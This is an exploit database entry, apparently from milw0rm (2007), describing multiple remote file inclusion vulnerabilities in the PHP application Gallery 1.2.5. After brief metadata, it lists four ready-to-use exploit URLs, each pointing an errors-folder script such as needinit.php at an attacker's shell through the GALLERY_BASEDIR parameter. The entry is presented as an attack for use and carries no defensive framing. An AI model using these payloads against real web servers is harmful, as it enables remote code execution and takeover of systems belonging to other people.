Gallery 1.2.5 - 'GALLERY_BASEDIR' Multiple Remote File Inclusions
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-04-14
date_updated:
verified: 1
codes: OSVDB-35391;OSVDB-35390;OSVDB-35389;OSVDB-35388
tags:
aliases:
screenshot_url:
application_url:
# Gallery 1.2.5 <= Remote File Include Vulnerablites
# D.Script: http://www.gnu-darwin.org/packages/x86/www/gallery-1.2.5.tgz
# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell
# milw0rm.com [2007-04-15]